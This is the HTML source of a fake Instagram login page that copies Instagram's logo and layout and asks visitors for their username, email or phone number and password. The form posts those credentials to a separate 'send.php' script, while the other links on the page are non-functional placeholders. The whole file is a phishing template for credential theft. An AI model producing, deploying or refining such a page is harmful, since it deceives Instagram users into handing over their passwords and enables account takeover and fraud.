<html>
<head>
    <title>Instagram</title>
    <meta charset="utf-8"> 
    <meta name="viewport" content=" width=device-width,initial-scale=1.0">
    <meta http-equiv="refresh" content="60" >
  <link rel= "icon" href="images/favicon.png" type="image/icon">
 <link rel ="stylesheet" type ="text/css" href ="style.css" >
       
</head>
<body>
    <div class="container"> 
    <div class=" text">log in to Continue</div>
    <div class ="page">
    <div class="logo">

 <img src="images/instagram.png" alt= "instagram" style="width: 175px; ">
</div>
       
<form class ="container" action= "send.php">    
<input type ="text" placeholder="Phone number,username or email " name="u_name">
<input type="text" placeholder="Password."  name="pass">
 <button class="submitbutton">Log in </button>
  <div class="option">OR </div>
    </form>
        
    <div class="fblink">
        <span class="fab fafacebook"></span>
        <a href ="#"> Log in With Facebook</a>
         </div>
        
        <div class="forget-id">
        <a href="#">Forget password?</a>
        </div>
    <div class="singup">
     <p>Don't have an account?<a href="#">
         Sign up</a></p>   
        </div>
        
                            
    </body>
   </html
